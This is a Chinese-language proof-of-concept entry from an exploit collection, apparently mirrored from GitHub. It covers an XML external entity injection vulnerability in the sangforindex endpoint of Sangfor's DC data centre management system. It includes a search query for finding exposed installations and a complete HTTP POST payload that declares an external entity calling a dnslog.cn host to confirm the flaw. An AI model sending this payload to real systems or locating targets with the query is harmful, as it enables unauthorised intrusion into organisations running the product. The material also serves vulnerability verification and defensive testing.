admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/深信服 DC数据中心管理系统 sangforindex XML实体注入漏洞.md
Threekiii 772a085cfa 更新漏洞
2023-08-28 15:55:36 +08:00

39 lines
720 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 深信服 DC数据中心管理系统 sangforindex XML实体注入漏洞
## 漏洞描述
深信服 DC数据中心管理系统 sangforindex 接口存在XML实体注入漏洞攻击者可以发送特定的请求包造成XML实体注入
## 漏洞影响
深信服 DC数据中心管理系统
## 网络测绘
```
"SANGFOR 数据中心"
```
## 漏洞复现
登陆页面
![image-20230828143259744](images/image-20230828143259744.png)
验证POC
```
POST /src/sangforindex HTTP/1.1
Host:
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
<!ENTITY rootas SYSTEM "http://xgsg1k.dnslog.cn">
]>
<xxx>
&rootas;
</xxx>
```
![image-20230828143318826](images/image-20230828143318826.png)
Reference in New Issue View Git Blame Copy Permalink